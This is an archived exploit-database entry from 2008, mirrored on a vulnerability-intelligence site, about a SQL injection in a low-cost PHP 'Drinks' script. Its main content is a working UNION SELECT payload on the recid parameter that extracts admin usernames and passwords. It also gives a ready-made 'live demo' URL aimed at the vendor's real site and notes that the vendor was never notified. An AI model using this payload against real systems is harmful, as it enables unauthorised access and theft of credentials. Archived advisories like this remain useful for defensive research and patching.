Lucene search

K

HarlandScripts drinks (recid) Remote SQL Injection Velnerability

🗓️ 05 Nov 2008 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 11 Views

HarlandScripts drinks Remote SQL Injection Vulnerability. Vendor: fivedollarscripts.com. Exploit through index.php?cmd=6&recid=null. Contact x.s7acy at gmail dot com

Show more
Code

                                                ===========================================
Drinks script.
--------------------------------------------------------------------------------------
Vendor:     http://www.fivedollarscripts.com
Demo:       http://www.fivedollarscripts.com/drinks/index.php
Notified:     No. Probably don't care.
Price:        Five bones.
============================================

Exploit:
/path/index.php?cmd=6&recid=null union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--

Live Demo:
http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=null
union all select
1,null,concat(username,char(58),password),4,5,6,7,8,9,10,11,12 from
drinksadmin--

contact: x.s7acy at gmail dot com
greetings to bobthejanitor, mason, that new president guy, and the rest.
first script blah blah blah
=============================================

# milw0rm.com [2008-11-05]

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo